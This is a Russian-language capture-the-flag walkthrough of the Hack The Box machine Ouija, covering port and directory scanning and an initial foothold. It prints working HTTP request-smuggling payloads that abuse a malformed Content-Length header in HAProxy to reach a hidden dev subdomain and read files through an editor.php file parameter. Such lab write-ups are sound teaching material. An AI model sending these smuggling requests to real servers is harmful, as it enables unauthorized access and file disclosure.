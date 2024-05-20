Цен­траль­ной частью это­го рай­тапа будет повыше­ние при­виле­гий в Linux через модуль PHP — мы про­экс­плу­ати­руем бинар­ную уяз­вимость целочис­ленно­го перепол­нения в нем. На пути к это­му исполь­зуем баг HTTP request smuggling в Haproxy и через LFI про­чита­ем SSH-ключ поль­зовате­ля.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине Ouija с учеб­ной пло­щад­ки Hack The Box. Уро­вень ее слож­ности — «слож­ный».

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 244 ouija. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ска­нер нашел три откры­тых пор­та:

22 — служ­ба OpenSSH 8.9p1;

80 — веб‑сер­вер Apache 2.4.52;

3000 — при­ложе­ние Node.js.

На началь­ном эта­пе нам дос­тупно два веб‑при­ложе­ния.

Точка входа

При прос­мотре исто­рии зап­росов в Burp History мож­но уви­деть зап­рос к домену gitea. ouija. htb .

До­бав­ляем новый домен в / etc/ hosts и прос­матри­ваем дос­тупные неав­торизо­ван­ному поль­зовате­лю репози­тории.

10. 10. 11. 244 ouija. htb gitea. ouija. htb

Дос­тупен толь­ко один репози­торий, опи­сание которо­го рас­кры­вает некото­рые исполь­зуемые тех­нологии. Отдель­но отме­чаем прок­си‑сер­вер Haproxy.

Так как ничего инте­рес­ного в самом репози­тории най­ти не уда­лось, прис­тупим к ска­ниро­ванию.

Справка: сканирование веба c feroxbuster Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов с целью поис­ка скры­той информа­ции и недос­тупной обыч­ным посети­телям фун­кций. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch, dirb или ffuf. Я пред­почитаю feroxbuster. При запус­ке исполь­зуем сле­дующие парамет­ры: -u — URL;

— URL; -w — сло­варь (я исполь­зую сло­вари из набора Seclists);

— сло­варь (я исполь­зую сло­вари из набора Seclists); -t — количес­тво потоков;

— количес­тво потоков; -d — глу­бина ска­ниро­вания.

За­даем нуж­ные парамет­ры и запус­каем ска­нер:

feroxbuster -u http:/ / ouija. htb/ -t 128 -d 1 -w files_ interesting. txt

Стра­ница server-status содер­жит логи зап­росов. По логам сно­ва дела­ем вывод о прок­сирова­нии на порт 8080.

Ана­логич­но ска­ниру­ем и катало­ги на пор­те 3000, где работа­ет API NodeJS.

feroxbuster -u http:/ / ouija. htb: 3000/ -t 128 -d 1 -w directory_ 2. 3_ medium_ lowercase. txt

Най­ден­ный стра­ницы сооб­щают либо об ошиб­ке, либо о том, что нуж­ны допол­нитель­ные заголов­ки HTTP.

То, что мы наш­ли новый под­домен, ука­зыва­ет на то, что их может быть и боль­ше двух. Так что давай рас­чехлим ска­нер fuff и запус­тим со сле­дующи­ми парамет­рами:

-u — URL;

— URL; -w — сло­варь;

— сло­варь; -t — количес­тво потоков;

— количес­тво потоков; -H — HTTP-заголо­вок;

— HTTP-заголо­вок; -fs — филь­тр по раз­меру отве­та.

ffuf -u "http:// ouija. htb" -H 'Host: FUZZ. ouija. htb' -t 128 -w subdomains- top1million- 110000. txt -fs 10671

Все под­домены, содер­жащие подс­тро­ку dev , воз­вра­щают код 403. Это наводит на мысль о том, что исполь­зует­ся филь­тр.

Точка опоры

Haproxy — HTTP Request Smuggling

Мы зна­ем о том, что исполь­зует­ся Haproxy, а это зна­чит, что для него мож­но поис­кать готовые экс­пло­иты. Про­ще все­го это делать в Google.

В пер­вом най­ден­ном репози­тории находим PoC.

Вы­пол­няем подоб­ный зап­рос, но в качес­тве целево­го адре­са ука­зыва­ем сайт на домене dev .

POST / index. html HTTP/ 1. 1 Host: ouija. htb Content- Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Content- Length: 38 GET http:/ / dev. ouija. htb/ HTTP/ 1. 1 h: GET / HTTP/ 1. 1 Host: ouija. htb

И в отве­те получа­ем две стра­ницы сра­зу: ouija. htb и dev. ouija. htb . На вто­рой — два фай­ла. Заг­ружа­ем их зап­росами вро­де сле­дующе­го:

POST / index. html HTTP/ 1. 1 Host: ouija. htb Content- Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Content- Length: 60 GET http:/ / dev. ouija. htb/ editor. php? file=app. js HTTP/ 1. 1 h: GET / HTTP/ 1. 1 Host: ouija. htb